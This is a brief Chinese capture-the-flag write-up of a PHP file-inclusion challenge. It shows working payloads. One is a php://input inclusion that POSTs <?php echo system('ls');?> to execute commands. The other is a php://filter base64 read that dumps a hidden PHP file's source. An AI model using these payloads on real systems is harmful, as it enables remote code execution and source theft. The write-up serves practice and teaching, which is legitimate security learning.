考察文件包含
打开题目:发现 allow_url_include on
直接构造?path=php://input
post参数<?php echo system('ls');?>
列出文件名看看:
发现有个奇怪的文件:dle345aae.php
查看此文件内容:使用php://filter协议查看曝露出来的文件的内容,因为PHP文件不能直接显示内容所以先base64显示出来,然后再解码。
构造语句:
?path=php://filter/read=convert.base64-encode/resource=dle345aae.php
解码:
bingo